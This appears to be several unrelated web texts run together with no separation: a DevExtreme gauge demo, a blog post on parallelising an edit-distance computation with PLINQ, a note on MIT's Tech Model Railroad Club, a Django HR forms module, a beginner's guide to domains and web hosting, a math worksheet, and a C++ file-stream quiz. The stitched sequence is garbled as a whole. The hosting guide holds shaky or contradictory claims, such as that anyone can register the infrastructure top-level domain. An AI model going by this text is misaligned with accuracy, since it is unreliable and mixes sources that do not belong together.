    onValueChanged(data) {
      product.active = data.value;
      gauge.values(productsToValues());
    },
  })));
});
index.html:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>DevExtreme Demo</title>
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" />
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script>window.jQuery || document.write(decodeURIComponent('%3Cscript src="js/jquery.min.js"%3E%3C/script%3E'))</script>
  <link rel="stylesheet" type="text/css" href="https://cdn3.devexpress.com/jslib/22.1.4/css/dx.common.css" />
  <link rel="stylesheet" type="text/css" href="https://cdn3.devexpress.com/jslib/22.1.4/css/dx.light.css" />
  <script src="https://cdn3.devexpress.com/jslib/22.1.4/js/dx.all.js"></script>
  <script src="data.js"></script>
  <link rel="stylesheet" type="text/css" href="styles.css" />
  <script src="index.js"></script>
</head>
<body class="dx-viewport">
  <div class="demo-container">
    <div class="long-title"><h3>Sampling by Goods</h3></div>
    <div id="gauge-demo">
      <div id="gauge"></div>
      <div id="panel"></div>
    </div>
  </div>
</body>
</html>
styles.css:

#gauge-demo {
  height: 440px;
  width: 100%;
}

#gauge {
  width: 80%;
  height: 100%;
  margin-top: 20px;
  float: left;
}

#panel {
  width: 150px;
  text-align: left;
  margin-top: 20px;
  float: left;
}

.dx-checkbox {
  margin-bottom: 10px;
  display: block;
}

.long-title h3 {
  font-weight: 200;
  font-size: 28px;
  text-align: center;
  margin-bottom: 20px;
}
data.js:

const products = [
  { name: 'Hammers', count: 41, active: true },
  { name: 'Shovels', count: 32, active: true },
  { name: 'Ladders', count: 13, active: true },
  { name: 'Watering cans', count: 48, active: true },
  { name: 'Screwdrivers', count: 24, active: true },
  { name: 'Nail pullers', count: 8, active: true },
  { name: 'Drills', count: 19, active: true },
];
.NET 4.0 And Our Parallel Future
I want to show you an algorithm; it is a pretty simple one. It is an implementation of the Damerau–Levenshtein edit distance algorithm, from the pseudocode on Wikipedia:
public static int EditDistance(string string1, string string2)
{
var s1Length = string1.Length;
var s2Length = string2.Length;
var matrix = new int[s1Length + 1, s2Length + 1];
for (int i = 0; i <= s1Length; i++)
matrix[i, 0] = i;
for (int j = 0; j <= s2Length; j++)
matrix[0, j] = j;
for (int i = 1; i <= s1Length; i++)
{
for (int j = 1; j <= s2Length; j++)
{
int cost = (string2[j - 1] == string1[i - 1]) ? 0 : 1;
matrix[i, j] = (new[] { matrix[i - 1, j] + 1,
matrix[i, j - 1] + 1,
matrix[i - 1, j - 1] + cost}).Min();
if ((i > 1) && (j > 1) &&
(string1[i - 1] == string2[j - 2]) &&
(string1[i - 2] == string2[j - 1]))
{
matrix[i, j] = Math.Min(
matrix[i, j],
matrix[i - 2, j - 2] + cost);
}
}
}
return matrix[s1Length, s2Length];
}
And I plan to use it to load up a word list:
var words = new List<string>();
using (var streamReader = new StreamReader("english-words.95"))
{
string line;
while ((line = streamReader.ReadLine()) != null)
{
words.Add(line);
}
}
Then I needed to run a shorter list of words against this list of words and get edit distances:
var result = new List<int>();
foreach (string word1 in words)
{
foreach (string word2 in words2)
{
result.Add(EditDistance(word1, word2));
}
}
Interestingly enough, this process takes quite a while. Especially if I have a few hundred thousand words in my word list. Go figure.
But since I am using .Net 4.0 (like any normal obsessive developer), I might have the great idea to leverage the awesome parallel libraries included in .Net 4.0 such as System.Threading.Tasks.Parallel.ForEach… phew, that was long:
var result = new List<int>();
Parallel.ForEach(words, word1 =>
{
foreach (string word2 in words2)
{
result.Add(EditDistance(word1, word2));
}
});
Thankfully I was logging out the number of items in my result array, and I noticed an anomaly. While running single threaded I got back more items than when running in parallel. I got the performance increase I wanted, but my result was now wrong! Oooops! Thankfully I know that this was because I used a List<T>, which is not thread-safe. So I just leveraged another feature in .NET 4.0, the ConcurrentBag:
var result = new ConcurrentBag<int>();
Parallel.ForEach(words, word1 =>
{
foreach (string word2 in words2)
{
result.Add(EditDistance(word1, word2));
}
});
This is great, but unfortunately I had to know that if I didn’t use the ConcurrentBag, then my result would be off, but I wouldn’t get any exceptions. Just a silent race condition which caused my result to be wrong.
But how can we avoid this? One way would be to approach the problem from a different perspective. What if we tried to solve the original problem with LINQ? Our solution would need to take all the elements from the first list, and apply all the elements from the second list to each of them. Hmm, sounds a bit like a cross join to me. This can easily be solved in LINQ with the SelectMany method:
var result = words
.SelectMany(word1 => words2.Select(word2 => EditDistance(word1, word2)));
Neato, and if we wanted to write this in the built-in query syntax, it looks like this:
var result = from word1 in words
from word2 in words2
select EditDistance(word1, word2);
And that actually looks more natural. (IMO one of the few times where the query syntax does look more natural to me) Now that we have solved it with LINQ using a more functional approach, we no longer have to worry about thread safety because we aren’t using any mutable structures. Leveraging PLINQ, all we have to do is add "AsParallel" to the main list of words:
var result = words.AsParallel()
.SelectMany(word1 => words2.Select(word2 => EditDistance(word1, word2)));
Or like this:
var result = from word1 in words.AsParallel()
from word2 in words2
select EditDistance(word1, word2);
And we have multi-threaded execution! Now, there are a few things that we still have to worry about, such as ordering. But PLINQ will also allow us to specify it like this:
var result = words.AsParallel().AsOrdered()
.SelectMany(word1 => words2.Select(word2 => EditDistance(word1, word2)));
And there you have it, without all that much effort, but by leveraging some simple LINQ queries, we have created a nicely scalable piece of parallel code. I hope you found this interesting, and I hope that you’ll let me know if you get a chance to use any of this in your applications!
I’m creating a series on LINQ over at TekPub, go check it out!
I had some inquiries as to the performance of this on my machine, and so here are the relative measurements:
foreach loop – 37 seconds
Parallel.ForEach – 31 seconds – This could be further optimized
LINQ – 39 seconds
LINQ with AsParallel() – 23 seconds
LINQ with AsParallel() and AsOrdered() – 25 seconds
The Parallel.ForEach was a naive implementation that used the ConcurrentBag in order to achieve thread safety. Unfortunately this isn’t as efficient as we could make it. This could be optimized by using another overload of Parallel.ForEach in order to implement a list per thread and then combine them at the end. That would give us much better performance.
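For the curious, that overload looks roughly like the sketch below; this is my illustration of the localInit/localFinally pattern, not code from the original benchmark:

var result = new List<int>();
object gate = new object();

Parallel.ForEach(
    words,
    // localInit: each worker thread gets its own private list
    () => new List<int>(),
    // body: no locking needed, we only touch the thread-local list
    (word1, loopState, local) =>
    {
        foreach (string word2 in words2)
        {
            local.Add(EditDistance(word1, word2));
        }
        return local;
    },
    // localFinally: merge each thread's list under a short lock
    local => { lock (gate) { result.AddRange(local); } });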
7 comments
1. Great post — thanks. What sort of performance improvements did you see moving to the parallel implementation?
2. Very interesting Justin. It would have been really cool if you compared the execution times with and without using any parallel extensions and posted them as part of the post.
How significant was the increase in performance?
3. @Danimal @Rob I have posted the performance numbers that I saw. Unfortunately I only have a dual core proc to try it on.
4. Thanks Justin. It’s pretty cool that with a pretty easy coding change you could get an impressive performance improvement.
5. Great post, thanks. This was especially interesting for me, as I wrote a parallel processing framework for the purpose of running Levenshtein in .NET 2.0! I will experiment to see if this is any faster, but man, it would have saved me a lot of work back then.
I assume you were using Levenshtein only for the purpose of demo-ing this new framework, but if you actually are trying to optimize, you should use this version of Levenshtein. It’s 2.5 times faster – http://webreflection.blogspot.com/2009/02/levenshtein-algorithm-revisited-25.html
6. @Sam Thanks! And yes, I just ported the code from Wikipedia directly. If I have to use it in production, I’ll most certainly check out your implementation. Actually, I’ll probably check it out for fun anyways. :-)
7. Hello, thanks for the great blog post.
Under what licence have you released this code you wrote that is now listed on this wiki entry?
http://en.wikipedia.org/wiki/Damerau%E2%80%93Levenshtein_distance
MIT/GPL like jquery ? http://jquery.org/license
Thanks!
Jeff
Tech Model Railroad Club
Guy Lochhead, 01/09/10
A model railroad club at the Massachusetts Institute of Technology (MIT) that played a hugely important role in the origins of hacker culture. TMRC members developed several pioneering computer programs, including Colossal Typewriter (early text editing), Expensive Tape Recorder (digital recording twenty years ahead of its time), Expensive Planetarium (the accurate star map for 'Spacewar!'), Spacewar! itself (one of the earliest video games) and Expensive Desk Calculator (computing's first interactive calculation program). They also coined numerous hacker slang terms, and are widely credited as the origin of the 'information wants to be free' motto of the free-content movement. This is pretty much the birth of nerd culture. It's so far beyond my comprehension and I love it. It coupled genuine innovation with an anti-monopoly, pro-sharing ethic. It is an example of friends feeding off each other to use knowledge in an incredibly exciting, admirable way. And they managed to keep a rad sense of humour! They work hard, they play hard!
[auf_rh_dae.git] / project / dae / forms.py
# -*- encoding: utf-8 -*-

from django.db.models import Q
from django import forms
from django.forms.models import inlineformset_factory
from django.contrib.admin import widgets as admin_widgets
from ajax_select.fields import AutoCompleteSelectField
from auf.django.workflow.forms import WorkflowFormMixin
from datamaster_modeles import models as ref
from dae import models as dae
from utils import get_employe_from_user, is_user_dans_services_centraux
from rh_v1 import models as rh
from workflow import grp_drh, POSTE_ETATS_BOUTONS

def _implantation_choices(obj, request):
    # NORMAL processing
    employe = get_employe_from_user(request.user)
    # SERVICE (central services)
    if is_user_dans_services_centraux(request.user):
        q = Q(**{'id': employe.implantation_id})
    # REGION
    else:
        q = Q(**{'region': employe.implantation.region})

    # DRH (HR department) processing
    if grp_drh in request.user.groups.all():
        q = Q()
    return [('', '----------')] + [(i.id, unicode(i)) for i in ref.Implantation.objects.filter(q)]

def _employe_choices(obj, request):
    q = Q(id_rh__isnull=True) & Q(id_rh__isnull=True)

    # NORMAL processing
    employe = get_employe_from_user(request.user)
    # SERVICE (central services)
    if is_user_dans_services_centraux(request.user):
        q_region_service = Q(implantation1=employe.implantation) | Q(implantation2=employe.implantation)
    # REGION
    else:
        q_region_service = Q(implantation1__region=employe.implantation.region) | Q(implantation2__region=employe.implantation.region)
    # DRH (HR department) processing
    if grp_drh in request.user.groups.all():
        q_region_service = Q()

    # Build the list of employees by drawing on DAE (no info there) and on rh_v1.
    # For the filtering by region/service we are forced to look at the rh_v1
    # dossier, because that information does not exist on the rh_v1.Employe model.
    dae_ = dae.Employe.objects.filter(id_rh__isnull=True)
    copies = dae.Employe.objects.filter(Q(id_rh__isnull=False))
    id_copies = [p.id_rh_id for p in copies.all()]
    employes_ids = list(set([d.employe_id for d in rh.Dossier.objects.filter(q_region_service)]))
    rhv1 = rh.Employe.objects.filter(id__in=employes_ids).exclude(id__in=id_copies)

    def option_label(employe):
        return "%s %s" % (employe.nom.upper(), employe.prenom.title())

    return [('', 'Nouvel employé')] + \
           sorted([('dae-%s' % p.id, option_label(p)) for p in dae_ | copies] +
                  [('rh-%s' % p.id, option_label(p)) for p in rhv1],
                  key=lambda t: t[1])


def label_poste_display(poste):
    """Format a display label for a poste in a drop-down list."""
    label = u"%s - %s [%s]" % (poste.type_poste, poste.type_poste.famille_emploi.nom, poste.id)
    return label

class PostePieceForm(inlineformset_factory(dae.Poste, dae.PostePiece)):
    pass

class DossierPieceForm(inlineformset_factory(dae.Dossier, dae.DossierPiece)):
    pass

class FinancementForm(inlineformset_factory(dae.Poste, dae.PosteFinancement, extra=2)):
    pass


class DossierComparaisonForm(forms.ModelForm):

    recherche = AutoCompleteSelectField('dossiers', required=False)
    poste = forms.CharField(max_length=255, widget=forms.TextInput(attrs={'size': '60'}))

    class Meta:  # originally declared as "class Model:", which Django silently ignores
        model = dae.DossierComparaison

class DossierComparaisonForm(inlineformset_factory(dae.Dossier, dae.DossierComparaison, extra=3, max_num=3, form=DossierComparaisonForm)):
    pass

class PosteComparaisonForm(forms.ModelForm):

    recherche = AutoCompleteSelectField('postes', required=False)

    class Meta:  # originally declared as "class Model:", which Django silently ignores
        model = dae.PosteComparaison

class PosteComparaisonForm(inlineformset_factory(dae.Poste, dae.PosteComparaison, extra=3, max_num=3, form=PosteComparaisonForm)):
    pass

class FlexibleRemunForm(forms.ModelForm):

    montant_mensuel = forms.DecimalField(required=False)
    montant = forms.DecimalField(required=True, label='Montant annuel')

    class Meta:
        model = dae.Remuneration

class RemunForm(inlineformset_factory(dae.Dossier, dae.Remuneration, extra=5, form=FlexibleRemunForm)):
    pass

class PosteForm(forms.ModelForm):
    """ Poste form. """

    responsable = AutoCompleteSelectField('responsables', required=True)
    #responsable = forms.ModelChoiceField(
    #    queryset=rh.Poste.objects.select_related(depth=1))

    # The list of choices is left empty. See __init__ for the reason.
    poste = forms.ChoiceField(label="Nouveau poste ou évolution du poste",
                              choices=(), required=False)

    valeur_point_min = forms.ModelChoiceField(queryset=rh.ValeurPoint.actuelles.all(), required=False)
    valeur_point_max = forms.ModelChoiceField(queryset=rh.ValeurPoint.actuelles.all(), required=False)


    class Meta:
        model = dae.Poste
        exclude = ('actif', )
        fields = ('type_intervention',
                  'poste', 'implantation', 'type_poste', 'service', 'nom',
                  'responsable', 'local', 'expatrie', 'mise_a_disposition',
                  'appel', 'date_debut', 'date_fin',
                  'regime_travail', 'regime_travail_nb_heure_semaine',
                  'classement_min', 'classement_max',
                  'valeur_point_min', 'valeur_point_max',
                  'devise_min', 'devise_max',
                  'salaire_min', 'salaire_max',
                  'indemn_expat_min', 'indemn_expat_max',
                  'indemn_fct_min', 'indemn_fct_max',
                  'charges_patronales_min', 'charges_patronales_max',
                  'autre_min', 'autre_max', 'devise_comparaison',
                  'comp_locale_min', 'comp_locale_max',
                  'comp_universite_min', 'comp_universite_max',
                  'comp_fonctionpub_min', 'comp_fonctionpub_max',
                  'comp_ong_min', 'comp_ong_max',
                  'justification',
                  )
        widgets = dict(type_intervention=forms.RadioSelect(),
                       appel=forms.RadioSelect(),
                       nom=forms.TextInput(attrs={'size': 60},),
                       date_debut=admin_widgets.AdminDateWidget(),
                       date_fin=admin_widgets.AdminDateWidget(),
                       justification=forms.Textarea(attrs={'cols': 80},),
                       #devise_min=forms.Select(attrs={'disabled':'disabled'}),
                       #devise_max=forms.Select(attrs={'disabled':'disabled'}),
                       )

    def __init__(self, *args, **kwargs):
        """ Dynamically update the contents of the poste menu.

        If the menu is not updated this way, then on each instantiation
        of the form its contents get cached by the system and do not
        reflect the changes made by additions, modifications, etc.

        Also, in this case, a ModelChoiceField cannot be used because
        the "id" of each choice is special (see _poste_choices).

        """
        request = kwargs.pop('request')
        super(PosteForm, self).__init__(*args, **kwargs)
        self.fields['poste'].choices = self._poste_choices(request)
        self.fields['implantation'].choices = _implantation_choices(self, request)

        # When the dae.Poste does not exist, search the rhv1 dossiers
        if self.instance and self.instance.id is None:
            dossiers = self.instance.get_dossiers()
            if len(dossiers) > 0:
                self.initial['service'] = dossiers[0].service_id
                self.initial['nom'] = "%s %s" % (self.initial['nom'], self.instance.get_complement_nom())


    def _poste_choices(self, request):
        """ Drop-down menu for the postes.

        Made up of the dae postes plus the rh_v1 postes that have no
        equivalent in dae.

        """
        dae_ = dae.Poste.objects.ma_region_ou_service(request.user).filter(actif=True, id_rh__isnull=True)
        copies = dae.Poste.objects.ma_region_ou_service(request.user).exclude(id_rh__isnull=True)
        id_copies = [p.id_rh_id for p in copies.all()]
        rhv1 = rh.Poste.objects.ma_region_ou_service(request.user).filter(actif=True).exclude(id__in=id_copies)
        # Query optimization
        rhv1 = rhv1.select_related(depth=1)

        return [('', 'Nouveau poste')] + \
               sorted([('dae-%s' % p.id, label_poste_display(p)) for p in dae_ | copies] +
                      [('rh-%s' % p.id, label_poste_display(p)) for p in rhv1],
                      key=lambda t: t[1])

    def clean(self):
        """
        Conditional validation of certain fields.
        """
        cleaned_data = self.cleaned_data

        # Handling of "mise à disposition"
        mise_a_disposition = cleaned_data.get("mise_a_disposition")
        valeur_point_min = cleaned_data.get("valeur_point_min")
        valeur_point_max = cleaned_data.get("valeur_point_max")
        if mise_a_disposition is False and (valeur_point_min is None or valeur_point_max is None):
            msg = u"Ce champ est obligatoire."
            self._errors["valeur_point_min"] = self.error_class([msg])
            self._errors["valeur_point_max"] = self.error_class([msg])
            raise forms.ValidationError("Les valeurs de point sont vides")

        if cleaned_data.get("local") is False and cleaned_data.get("expatrie") is False:
            msg = "Le poste doit au moins être ouvert localement ou aux expatriés"
            self._errors["local"] = self.error_class([msg])
            self._errors["expatrie"] = ''
            raise forms.ValidationError(msg)


        return cleaned_data



    def save(self, *args, **kwargs):
        kwargs2 = kwargs.copy()
        kwargs2['commit'] = False
        poste = super(PosteForm, self).save(*args, **kwargs2)
        # id_rh
        if 'commit' not in kwargs or kwargs['commit']:
            poste.save()
        return poste


class ChoosePosteForm(forms.ModelForm):
    class Meta:
        model = dae.Poste
        fields = ('poste',)

    # The list of choices is left empty. See PosteForm.__init__.
    poste = forms.ChoiceField(choices=(), required=False)

    def __init__(self, request=None, *args, **kwargs):
        super(ChoosePosteForm, self).__init__(*args, **kwargs)
        self.fields['poste'].choices = self._poste_choices(request)

    def _poste_choices(self, request):
        """ Drop-down menu for the postes. """
        dae_ = dae.Poste.objects.ma_region_ou_service(request.user).filter(id_rh__isnull=True)
        copies = dae.Poste.objects.ma_region_ou_service(request.user).exclude(id_rh__isnull=True)
        id_copies = [p.id_rh_id for p in copies.all()]

        return [('', '----------')] + \
               sorted([('dae-%s' % p.id, unicode(p)) for p in dae_ | copies],
                      key=lambda t: t[1])


class EmployeForm(forms.ModelForm):
    """ Employee form. """
    class Meta:
        model = dae.Employe
        fields = ('employe', 'nom', 'prenom', 'genre')

    # The list of choices is left empty. See Poste.__init__ for the reason.
    employe = forms.ChoiceField(choices=(), required=False)

    def __init__(self, *args, **kwargs):
        """ Dynamically update the contents of the employee menu. """
        request = kwargs.pop('request', None)
        super(EmployeForm, self).__init__(*args, **kwargs)
        self.fields['employe'].choices = _employe_choices(self, request)



class DossierForm(forms.ModelForm):
    """ Dossier form. """
    class Meta:
        exclude = ('etat', )
        model = dae.Dossier
        widgets = dict(statut_residence=forms.RadioSelect(),
                       contrat_date_debut=admin_widgets.AdminDateWidget(),
                       contrat_date_fin=admin_widgets.AdminDateWidget(),
                       )

WF_HELP_TEXT = ""

class PosteWorkflowForm(WorkflowFormMixin):
    bouton_libelles = POSTE_ETATS_BOUTONS
    class Meta:
        fields = ('etat', )
        model = dae.Poste

    def __init__(self, *args, **kwargs):
        super(self.__class__, self).__init__(*args, **kwargs)
        self.fields['etat'].help_text = WF_HELP_TEXT


class DossierWorkflowForm(WorkflowFormMixin):
    bouton_libelles = POSTE_ETATS_BOUTONS  # same workflow as poste...
    class Meta:
        fields = ('etat', )
        model = dae.Dossier

    def __init__(self, *args, **kwargs):
        super(self.__class__, self).__init__(*args, **kwargs)
        self.fields['etat'].help_text = WF_HELP_TEXT
Difference Between Domain Name and Web Hosting: The Ultimate Beginner's Guide 2022
6-minute read
Last updated: May 12, 2022
Domain and hosting are two different things, but neither works alone. So what is a domain name, what is hosting, and how are the two related? You need to know this before you start developing a website to establish your business's online presence.
The first thing anyone does to launch a website or web app is purchase a good domain name and a web hosting package together. Without these two things, a website has no identity or existence on the internet.
So, one way or another, thinking about domain names and web hosting is undeniably important if you are planning to build a new site. Yet even though web development and management are commonplace, people still mix up these two wholly different things and make a mess.
So let's settle the domain vs. hosting debate today. Here is all the detailed information you need about domain names and web hosts, so you can have a clear picture of the matter and start building your website on a good footing.
What is a Domain Name?
When you type the address of a website into your browser's address bar, you can see a part after www. This part is unique among all active addresses and carries the identity of the website it belongs to, so internet users across the world can access or identify a website or web app by that part of the address alone. This unique portion is what we call a website's domain name.
In short, a domain name represents its website through relevance and uniqueness.
Why is a Domain Name So Important?
Suppose you are trying to bring your business online. What would you do? Surely, you'd try to purchase a domain name for the official website (or a personal site) that resembles the business, right?
If that's the case, then here's another question: why would you pick a domain name relevant to your company's name or activities from the available domain databases? Again, we think the answer is simply to let internet users find you among millions of other websites and to give your site its own identity.
Types of Top-Level Domains (TLDs)
There are a lot of top-level domains, or TLDs, available on the internet. The most common are .com, .net, and .org. There are also some cheap domain extensions such as .mobi, .store, etc.
Generic Top-Level Domains
These are the domain name extensions that appear at the end of a domain, such as .com, .net, and .org. There are 22 gTLDs, but only a handful are used often.
For commercial use, ".com" is the most popular domain extension. It's been around since 1985 and is the oldest gTLD. .net is the second most popular gTLD and is used for websites that provide internet services, such as web hosting and domain registration.
Sponsored Top-Level Domains
The organization or consortium sponsoring an sTLD is responsible for setting policy and managing the domain.
The use of sponsored top-level domains is not limited to commercial organizations. For example, .mil is used by the US military to create its unique identity, and .gov is used by government offices.
Country Code Top-Level Domains
A ccTLD is an internet domain extension used to identify a country or a territory.
Each one is a specific two-letter code based on the country or territory. For example, .us marks an American website and .uk a British one. A ccTLD is sometimes combined with a second-level domain extension.
ccTLDs are administered by the country's national registry. In most cases, the registry is also the operator of the corresponding top-level domain.
Infrastructure Top-Level Domains
This is the newest kind of top-level domain, still striving to become popular. It would be delegated in the root zone and used to identify resources related to the infrastructure of the internet, such as Internet Exchange Points (IXPs), Autonomous System Numbers (ASNs), and Internet Service Providers (ISPs).
The infrastructure TLD would be administered by ICANN, and anyone can register.
Domain Registration
First of all, you'll need to decide on a domain name, using domain checker tools to confirm it is available. There is no practical limit on how long you can keep a domain registered, but the minimum registration period with domain registrars is one year.
You have to register a domain using your personal information. This information is used to create your domain's WHOIS record, part of a public database of all domain owners. However, you can turn on domain privacy protection to prevent information leaks.
Choosing a perfect domain name can be one of the most important steps in establishing your brand or business.
What is Web Hosting?
Next up, it's time to discuss what hosting is.
Speaking plainly, web hosting is what gives websites a place to live on the internet. Hosting services host the website attached to a domain name so it can perform and respond to users.
Once you are done with domain registration, you choose a web host and point the domain at it via DNS settings.
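As an illustration, pointing a domain at a host usually comes down to editing a couple of records in the domain's DNS zone. A minimal sketch with placeholder values (203.0.113.x is a reserved documentation range, not a real server):

; hypothetical zone entries for example.com
example.com.        3600  IN  A      203.0.113.10   ; the web host's IPv4 address
www.example.com.    3600  IN  CNAME  example.com.   ; www points to the bare domain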
What Factors Should You Look at Before Choosing a Web Host?
Before choosing any web host, consider the following factors to ensure the best quality of service that suits you.
User-Friendliness
Some web hosts are more user-friendly than others. Some make it easy to find information, while others are not as clear. You want to make sure that the hosting service provider you choose has a website that is easy to navigate. Their customer service should also be good. If you have any questions or problems, you should be able to get help quickly.
Server Speed and Uptime
Server speed is how quickly the server can send pages to your computer. You want to make sure that pages load quickly so that your visitors do not get frustrated and leave your site. You can test server speed with a tool like Pingdom or WebPageTest.
Pricing and Plans
The most important factor to consider when choosing a web hosting plan is what type of website you plan to create. If you are creating a small website with a few pages, you may get by with a free hosting plan. However, if you create a larger website with a lot of content, you will need a more robust hosting plan that includes more storage and bandwidth.
Customer Service
Some web hosts provide excellent customer service, while others do not. You should take the time to read reviews of different web hosts to get an idea of how they treat their customers.
Types of Web Hosting
There are four types of web hosting available by hosting providers. The most common are shared, VPS, and dedicated hosting.
Shared Hosting
Shared hosting is hosting where multiple websites share space on one server, in a cheap price range.
To keep the price down, several websites share a single server's CPU, memory, and disk space.
It's usually called starter hosting: a cheap way to get going while your website has a small amount of traffic.
VPS Hosting
VPS hosting gives you root access to your own virtual server. This means you can install any software you want and customize the server to your own needs.
VPS hosting is the perfect alternative to dedicated hosting when you don't want to pay a high price tag for dedicated hosting yet want a similar experience.
Dedicated Hosting
As the name suggests, dedicated hosting is dedicated to one single customer.
It is often used to host a single website that receives massive traffic.
There are a lot of CPU and disk space options, which you have to pick based on your traffic.
It is ideal for businesses that require a lot of storage space or bandwidth, or for businesses that have high-traffic websites.
In addition, a dedicated server is capable of hosting multiple websites.
Cloud Hosting
Cloud hosting is a model of web hosting where data and applications are stored on remote servers and accessed over the internet.
The term "cloud" refers to the fact that the services are provided using a remote network of servers, which gives cloud hosting users the illusion of using a single large server.
This setup allows for easy scalability, as businesses can add or remove resources as their needs change.
How to Buy a Web Hosting Service
There are plenty of web hosting providers where you can get your desired hosting, and you can follow these steps to buy a web hosting service.
• Decide what kind of hosting service you need.
• Choose a hosting provider.
• Register for an account.
• Enter your account information.
• Choose a domain name.
• Enter your site's information.
• Upload your files.
• Configure your site.
• Test your site.
Domain Name and Web Hosting: Why the Confusion?
The confusion between domain names and web hosting usually arises when people register a domain name and then look for a web hosting company. They assume the web hosting company provides the domain name, but this is not the case: domain registration creates an identity, while hosting stores the website's data.
How Do Domain & Hosting Relate?
The domain name and web hosting are two integral aspects of any website. The domain name is the web address or URL of a website, and the hosting is the service that stores the website's files and makes them accessible to users over the internet.
When you register a domain name, you are essentially renting the use of that name from a domain name registrar. The registrar reserves the right to make the name available to other users if you do not renew your registration.
Hosting is a service that stores the website's files on a web server and makes them accessible to users over the internet. Hosting can be provided by a web hosting company or by the registrar who sells you the domain name.
Domain Name or Web Hosting? What Should I Buy to Start a Website?
If you want a lot of control over your website and you're willing to spend a little money, buying a domain name and setting up your web hosting is the best option. If you're not comfortable with coding or website development or don't expect a lot of website traffic, using a free web hosting service may be a better option.
Wrap Up
So, here we are at the end of our discussion. But before concluding our thoughts on domain names and web hosting, let's make one thing clear once again.
Domain and hosting are closely interrelated. That's why it's important to focus equally on both, to make sure the website you build has a unique address that matches the brand name and a reliable host so it performs flawlessly.
Common Domain & Hosting FAQs
Do I have to buy a domain & hosting together? Or can I buy them separately?
Domain and hosting can be bought separately, but it's often more convenient to buy them together. The domain name is a unique name or identity for your business. And hosting is where you store your data. So, when you buy hosting, you're typically also buying a domain name.
Is there any advantage to buying domain & hosting separately?
If you're looking for the best deal on each, or you want more control over your website, then buying them separately may be the right option for you. If you're not sure whether or not to buy the domain and hosting separately, speak with a hosting provider to get more advice.
Can I change my hosting company without changing the domain name?
Yes. You don't need to change your domain name when changing hosting companies; just update your DNS settings from the domain control panel to connect the domain to the new host.
Can I host my website?
Yes, it is possible, and you can do it in several ways. For example, you can use a web hosting company to host your website for you, or you can use a service like WordPress.com or Blogger to host your website for free. You can also purchase a domain name and set up your own web server. However, setting up and maintaining your own server can be a lot of work, and it can be expensive to buy and run.
How much does it cost to host a website?
The cost to host a website can vary depending on the size and type of website and the hosting company you choose. Generally, website hosting costs between $5 and $75 per month.
Equations with Absolute Values - Phạm Thành Luân
Shared by: Trần Bá Trung5 | Date: | File type: PDF | Pages: 2
874 views | 119 downloads

Document description
The document "Equations with Absolute Values - Phạm Thành Luân" is meant to give students review and practice material to master basic knowledge and skills, apply that knowledge to solve math exercises with ease, self-assess their study results, and improve their ability to apply what they know in exams. Happy studying!
Text content: Equations with Absolute Values - Phạm Thành Luân
C. SYSTEMS OF EQUATIONS AND INEQUALITIES WITH ABSOLUTE VALUES

Example 1: Solve the system
    x² + 2xy − 3y² = 0     (1)
    x·|x| + y·|y| = −2     (2)
Treat (1) as a quadratic in x: Δ′ = y² + 3y² = 4y², so x = y or x = −3y.
 - If x = y, (2) gives 2y|y| = −2, i.e. y|y| = −1, hence x = y = −1.
 - If x = −3y, (2) gives −9y|y| + y|y| = −2, i.e. 8y|y| = 2, hence y = 1/2 and x = −3/2.

Example 2: Given the system of inequalities
    y − |x² − x| − 1 ≥ 0        (1)
    |y − 2| + |x + 1| − 1 ≤ 0   (2)
a. Solve the system when y = 2.
b. Find the integer solutions of the system.

a. When y = 2 the system becomes |x² − x| ≤ 1 and |x + 1| ≤ 1. The first gives x² − x − 1 ≤ 0 (while x² − x + 1 ≥ 0 always holds) and the second gives −2 ≤ x ≤ 0, so together (1 − √5)/2 ≤ x ≤ 0.
b. From (1), y ≥ 1 + |x² − x| ≥ 1; from (2), |y − 2| ≤ 1 − |x + 1| ≤ 1, hence 1 ≤ y ≤ 3.
 - y = 1: the system has no solution.
 - y = 2: (1 − √5)/2 ≤ x ≤ 0.
 - y = 3: x = −1.
So the integer solutions of the system are (0, 2) and (−1, 3).

SUGGESTED EXERCISE
Find m so that the following system has a solution:
    x² − 3x − 4 ≤ 0              (1)
    x³ − 3x·|x| − m² − 15m ≥ 0   (2)

HINTS AND SUMMARY SOLUTION
(1) ⇔ −1 ≤ x ≤ 4, and (2) ⇔ x³ − 3x|x| ≥ m² + 15m.
Set f(x) = x³ − 3x|x|, i.e. f(x) = x³ + 3x² for −1 ≤ x < 0 and f(x) = x³ − 3x² for 0 ≤ x ≤ 4, so that f′(x) = 3x² + 6x on [−1, 0) and f′(x) = 3x² − 6x on [0, 4].
From the variation table, the maximum of f on [−1, 4] is f(4) = 16.
Hence the system has a solution ⇔ m² + 15m ≤ 16 ⇔ −16 ≤ m ≤ 1.
C++ PROGRAM QUESTIONS : PART 26
If we have an object of the fstream class, what will be the default mode for opening the file?
ios::in|ios::out
ios::in|ios::out|ios::trunc
ios::in|ios::trunc
Default mode depends on compiler
Answer: ios::in|ios::out
Which of the following is the return type of the is_open() function?
int
bool
float
char *
Answer: bool
Which of the following is not used to seek a file pointer?
ios::cur
ios::set
ios::end
ios::beg
Answer: ios::set
Which of the following statements describes ios::trunc mode?
If the file is opened for output operations and it already existed, no action is taken.
If the file is opened for output operations and it already existed, its previous content is deleted and replaced by the new one.
If the file is opened for output operations and it already existed, then a new copy is created.
None of the above
Answer: If the file is opened for output operations and it already existed, its previous content is deleted and replaced by the new one.
Which of the following options shows the correct syntax for opening a file?
myfile:open ("example.bin", ios::out);
myfile.open ("example.bin", ios::out);
myfile::open ("example.bin", ios::out);
myfile.open ("example.bin", ios:out);
Answer: myfile.open ("example.bin", ios::out);
Which of the following is the correct syntax for closing a file in C++?
myfile$close();
myfile@close();
myfile:close();
myfile.close();
Answer: myfile.close();
Which of the given options describes the use of the eof() stream function?
Returns true if a file open for reading has reached the next character.
Returns true if a file open for reading has reached the next word.
Returns true if a file open for reading has reached the end.
Returns true if a file open for reading has reached the middle.
Answer: Returns true if a file open for reading has reached the end.
Which of the following functions allow you to change the location of the get and put positions?
sg() and sp()
sekg() and sekp()
gog() and gop()
seekg() and seekp()
Answer: seekg() and seekp()
Which of the following is used for an offset counted from the current position?
ios::curr
ios::cr
ios::cur
ios::current
Answer: ios::cur
Which of the following is used for positioning relative to the beginning of a stream?
ios::start
ios::beg
ios::begin
ios::beginning
Answer: ios::beg
